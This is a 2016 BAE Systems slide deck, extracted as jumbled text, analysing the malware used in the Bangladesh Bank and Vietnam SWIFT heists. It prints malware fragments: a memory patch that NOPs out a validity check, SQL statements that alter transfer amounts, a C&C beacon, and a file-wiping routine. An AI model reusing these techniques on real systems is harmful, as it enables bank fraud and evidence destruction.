CyberHeist 2016

Shafique Dawood, Regional Director APAC

BAE Systems

1 | Copyright 2016 BAE Systems. All Rights Reserved.

 Feb.2016: Bangladesh Bank Heist
HOLLYWOOD (2001)
$150M

CYBER SPACE (2016)

$951M

2 | Copyright 2016 BAE Systems. All Rights Reserved.

 Schematics of Cyber Heist
˃ Normal Bank Operation

US BANK Corr. Account Beneficiary’s Bank

Beneficiary
Corr. Account

Foreign Bank

Ordering Account
Client

3 | Copyright 2016 BAE Systems. All Rights Reserved.

 Schematics of Cyber Heist
˃ Compromised Bank Operation

US BANK Corr. Account Compromised Bank

Beneficiary
Corr. Account

Foreign Bank

Ordering Account
Client

4 | Copyright 2016 BAE Systems. All Rights Reserved.

 Schematics of Cyber Heist
˃ Compromised Bank Operation

US BANK Corr. Account Compromised Bank

Beneficiary
Corr. Account

Offshore Bank

Ordering Account
Client

5 | Copyright 2016 BAE Systems. All Rights Reserved.

 Schematics of Cyber Heist
˃ Compromised Bank Operation

US BANK Corr. Account Compromised Bank

Beneficiary
Corr. Account

Offshore Bank

Ordering Account
Client

6 | Copyright 2016 BAE Systems. All Rights Reserved.

 Schematics of Cyber Heist
˃ Purpose of the Malware: Concealing the traces

7 | Copyright 2016 BAE Systems. All Rights Reserved.

 Bangladesh Bank Heist
May 2015 Four accounts setup at Rizal Commercial Banking Corp. (RCBC) in Philippines

24 Jan 2016 (Sun)

- 29 Jan 2016 (Fri) A ‘suspicious login’ was made & Sysmon run on ‘SWIFTLIVE’

4 Feb 2016 (Thu)

Attackers execute SWIFT transfer to accounts in Sri Lanka and Philippines

BB notice SWIFT error: ‘A file is missing or changed’

5 Feb 2016 (Fri)
6 Feb 2016 (Sat) BB regain access; find messages from US Fed Reserve querying transactions

Chinese New Year

8 Feb 2016 (Mon)
BB issues stop orders to US Fed, RCBC, and other banks in US and Sri Lanka

29 Feb 2016 (Mon) Philippine authorities freeze accounts at RCBC, as well as accounts at Casinos and of
companies used

8 | Copyright 2016 BAE Systems. All Rights Reserved.

 Bangladesh Bank Heist
˃ Cyber-attack details

4. SWIFT financial application (FIN) messages are now

monitored and intercepted by the malware. Functionality
continues in loop until 06:00 6th Feb 2016

SWIFT Alliance CONFIG FILE

5. SWIFT messages are sent to
Software server gpca.dat attacker printers and are printed
in real time

6. PRC and FAL files are scanned for attacker

defined terms. On match will extract transfer
reference and sender address to form a SQL
DELETE statement to delete a transaction

7. Messages that contain attacker defined

1. Attackers gain access
and install malware
2. Malware decrypts 3. Malware identifies
config file containing and exploits host’s
search terms to scan SWIFT application to
within SWIFT messages bypass validity check
within Oracle DLL
terms will be used to form SQL statements to
query Convertible Currency avail ability and
then update transfer amounts
8. Checks the ‘Login/Logout’ status of
the Journal table every hour and sends
result to attacker domain over HTTP

9 | Copyright 2016 BAE Systems. All Rights Reserved.

 Bangladesh Bank Heist
˃ Patch

if (VirtualProtectEx(hProcess, lpAddr, 2, PAGE_EXECUTE_READWRITE, (PDWORD)&hProcess)

&& ReadProcessMemory(hProcess, lpAddr, &buffer, 2, &dwRead))
{
if (bPatch) .data:0040F174 JNZ db 75h
{ .data:0040F175 db 4
if ((WORD)buffer == JNZ)
res = WriteProcessMemory(hProcess, lpAddr, &NOPs, 2, &dwWritten);
}
else .data:0040F170 NOPs db 90h
{ .data:0040F171 db 90h
if ((WORD)buffer == NOPs)
res = WriteProcessMemory(hProcess, lpAddr, &JNZ, 2, &dwWritten);
}
3. Malware checks to 4. If found, it overwrites 5. Overwritten bytes 6. The malware is now
if (res) see if any processes 2 bytes at a specific forces the host able to execute
VirtualProtectEx(hProcess, lpAddr, 2, hProcess, &flOldProtect); database transactions
have ‘liboradb.dll’ offset with ‘do nothing’ application to always
module loaded (0x90 NOP) instructions pass the validity check
}

10 | Copyright 2016 BAE Systems. All Rights Reserved.

 Bangladesh Bank Heist
˃ Patch Result
Original Code:
85 C0 test eax, eax ; some important check
75 04 jnz failed ; if failed, jump to 'failed' label below
33 c0 xor eax, eax ; otherwise, set result to 0 (success)
eb 17 jmp exit ; and then exit
failed:
B8 01 00 00 00 mov eax, 1 ; set result to 1 (failure)

Patched Code:

85 C0 test eax, eax ; some important check

90 nop ; 'do nothing' in place of 0x75
90 nop ; 'do nothing' in place of 0x04
33 c0 xor eax, eax ; always set result to 0 (success)
eb 17 jmp exit ; and then exit
failed:
B8 01 00 00 00 mov eax, 1 ; never reached: set result to 1 (failure)

11 | Copyright 2016 BAE Systems. All Rights Reserved.

 Bangladesh Bank Heist
˃ Patch

Authenticated?
NO
Do Nothing

?
Do Nothing

YES

Full Access

DataBase

12 | Copyright 2016 BAE Systems. All Rights Reserved.

 Bangladesh Bank Heist
˃ Replacing the 2 bytes affects 8 bits only

What’s easier to flip?

This?

90 04 = 1
75 90 0010
11 00
100
1 1
0001
0 00
100
Or this?

13 | Copyright 2016 BAE Systems. All Rights Reserved.

 Bangladesh Bank Heist
˃ Monitored messages
[ROOT_DRIVE]:\Users\Administrator\AppData\Local\Allians\mcm\in\
[ROOT_DRIVE]:\Users\Administrator\AppData\Local\Allians\mcm\out\
[ROOT_DRIVE]:\Users\Administrator\AppData\Local\Allians\mcp\in\*.*
[ROOT_DRIVE]:\Users\Administrator\AppData\Local\Allians\mcp\out\*.*
[ROOT_DRIVE]:\Users\Administrator\AppData\Local\Allians\mcp\unk\*.*
[ROOT_DRIVE]:\Users\Administrator\AppData\Local\Allians\mcs\nfzp
[ROOT_DRIVE]:\Users\Administrator\AppData\Local\Allians\mcs\nfzf
[ROOT_DRIVE]:\Users\Administrator\AppData\Local\Allians\mcs\fofp
[ROOT_DRIVE]:\Users\Administrator\AppData\Local\Allians\mcs\foff

Looking for:
"19A: Amount" "FEDERAL RESERVE BANK“
": Debit" " 20: Transaction"
"Debit/Credit :" "90B: Price”
"Sender :" "FIN 900 Confirmation of Debit“
"Amount :” "62F: “

14 | Copyright 2016 BAE Systems. All Rights Reserved.

 Bangladesh Bank Heist
˃ SQL queries
Monitoring Login/Logout events in the journal:
SELECT * FROM (SELECT JRNL_DISPLAY_TEXT, JRNL_DATE_TIME FROM
SAAOWNER.JRNL_%s WHERE JRNL_DISPLAY_TEXT LIKE '%%LT
BBHOBDDHA: Log%%' ORDER BY JRNL_DATE_TIME DESC) A WHERE
ROWNUM = 1;

GET: [C&C_server]/al?---O ‘BBHOBDDH’ is the SWIFT code for the

Bangladesh Bank in Dhaka
Manipulating balances (The amount of Convertible Currency):
UPDATE SAAOWNER.MESG_%s SET MESG_FIN_CCY_AMOUNT = '%s' WHERE MESG_S_UMID = '%s';
UPDATE SAAOWNER.TEXT_%s SET TEXT_DATA_BLOCK = UTL_RAW.CAST_TO_VARCHAR2('%s')
WHERE TEXT_S_UMID = '%s';

Sending ‘doctored’ (manipulated) SWIFT confirmation

messages for local printing:

15 | Copyright 2016 BAE Systems. All Rights Reserved.

 Cyber Heist: Vietnam
˃ Log/PDF Cleaning Tool
Original Log File Original PDF File
Read File Read blocks one-by-one Trojan reads PDF File
Timestamp Ignore blocks with Converts into XML
MESSAGE_FILENAME
PDF Read blocks one-by-one
XML File Ignore blocks with
Temporary File MESSAGE_FILENAME
Temporary File

DFB0 Fill Log User opens the

1CEA29 with PDF File
57B1FF Random
290DCA data Modified PDF File
Fill Pass Modified PDF
Temp File to FoxIT Reader
PDF
DFB0
File Trojan reads XML
1CEA29
57B1FF with Converts into PDF
290DCA Random
Restore original Replace Log data
PDF User opens the
Modified PDF File
Timestamp with Temp File

16 | Copyright 2016 BAE Systems. All Rights Reserved.

 Cyber Heist: Vietnam
˃ Monitored messages Looking for:
LOG_PATH\TPBVVNVX_TPBVVNVX_FileIn_DATE.txt ': Statement Line'
LOG_PATH\TPBVVNVX_TPBVVNVX_FilleOut_DATE.txt 'Closing Balance (Booked Funds)‘
LOG_PATH\TPBVVNVX_TPBVVNVX_PrintedIn_DATE.txt ' Opening Balance'
LOG_PATH\TPBVVNVX_TPBVVNVX_PrintedOut_DATE.txt 'Sender'
LOG_PATH\TPBVVNVX_TPBVVNVX_PrnIn_DATE.txt ': Debit'
LOG_PATH\TPBVVNVX_TPBVVNVX_PrnOut_DATE.txt ': Credit‘
': Closing Avail Bal (Avail Funds)‘
TPBVVNVX: Tien Phong Commercial Joint Stock, Hanoi
'Instance Type and Transmission'
Targeting transactions with SWIFT codes: ': FIN 950 '
SWIFT Code Banking Institution
U
A
B
M
C
U
I
I

17 | Copyright 2016 BAE Systems. All Rights Reserved.

 Cyber Heists: Vietnam first, then Bangladesh

18 | Copyright 2016 BAE Systems. All Rights Reserved.

 Attribution
Wipe-out function:

Machine Opcode Disassembled Code

B8 20 10 00 00 mov eax, 1020h
E8 96 EA 04 00 call __alloca_probe
53 push ebx
55 push ebp
57 push edi
FF 15 4C F0 45 00 call ds:GetTickCount
... ...

19 | Copyright 2016 BAE Systems. All Rights Reserved.

 Attribution
Wipeout function
(msoutc.exe, 2014)
B64E00 00
B820100000E8B64E0000535557FF1500
9040
90400050FF154C90400083C404C64424
4C9040
0CFFFF156890400025FF000080790748
689040
0D00FFFFFF408844240DB9FF03000033
C08D7C242DC644242C5F33DBF3AB66AB
5368800000006A0353AA8B8424401000
0053680000004050C644242AFF885C24
2BC644242C7EC644242DE7FF15A4AC40
A4AC40
1C9040
008BE883FDFF7510FF151C9040005F5D
5B81C420100000C3566A02536AFF55FF
15D4AC40008D4C242453518D5424386A
D4AC40
015255FF15ACAC400055FF15C8AC4000
ACAC40 C8AC40
1EFFFFFF55FF15A8AC40008B94243410
A8AC40
00005352E847FDFFFF83C4085E5F5D5B 00005352E847FDFFFF83C4085E5F5D5B
20 | Copyright 2016 BAE Systems. All Rights Reserved.
Wipe-out function
(Vietnam malware, 2015)
96EA04 4C
B820100000E896EA0400535557FF154C
F045
F0450050FF152CF1450083C404C64424
2CF145
0CFFFF1524F1450025FF000080790748
24F145
0D00FFFFFF408844240DB9FF03000033
C08D7C242DC644242C5F33DBF3AB66AB
5368800000006A0353AA8B8424401000
0053680000004050C644242AFF885C24
2BC644242C7EC644242DE7FF1548F045
48F045
008BE883FDFF7510FF1508F045005F5D
08F045
5B81C420100000C3566A02536AFF55FF
1544F045008D4C242453518D5424386A
44F045
015255FF1540F0450055FF153CF04500
40F045 3CF045
1EFFFFFF55FF1510F045008B94243410
10F045
 Attribution
Wipe-out function:
01 if (*fileName)
02 {
03 do
04 {
05 *fileName = rand() % 26 + 'a';
06 next_char = (fileName++)[1];
07 }
08 while ( next_char );
09 }
10 if (MoveFileA(lpExistingFileName, &_filepath))
11 _filePath = &_filepath;
12 if (bDir)
13 {
14 if (!RemoveDirectoryA(_filePath))
15 return GetLastError();
16 }
17 else if (!DeleteFileA(_filePath))
18 {
19 return GetLastError();
20 }
21 | Copyright 2016 BAE Systems. All Rights Reserved.
 Attribution
Event Event
2015 2016
Vietnam Tien Phong Bangladesh
Bank: Bangladesh
Heist Bank Heist
Attempt 16-Dec-2015
22-Dec-2015 4-Feb-2016/ 28-Feb-2016 25-Mar-2016
DEC 8-Dec-2015 JAN FEB MAR APR
5-Feb-2016

4-Dec-2015
Compiled Discovered Compiled Discovered
Foxit Reader.exe Foxit Reader.exe evtsys.exe evtsys.exe
mspdclr.exe Vietnam mspdclr.exe evtdiag.exe Bangladesh evtdiag.exe
nroff_b.exe nroff_b.exe

Trojanised Foxit Reader/SWIFT Message Cleaner

Main Malware used in Bangladesh Heist

US Cert Alert PwC msoutc.exe

FwtSqmSession10682932 FwtSqmSession10682932 FwtSqmSession10683932
3_S-1-5-19 3_S-1-5-19 3_S-1-5-20
y0uar3@s!llyid!07,ou74 y@s!11yid60u7f!07ou74 y@s!11yid60u7f!07ou74
Bangladesh n60u7f001 n001 n001

Vietnam

22 | Copyright 2016 BAE Systems. All Rights Reserved.

 Thank You.

23 | Copyright 2016 BAE Systems. All Rights Reserved.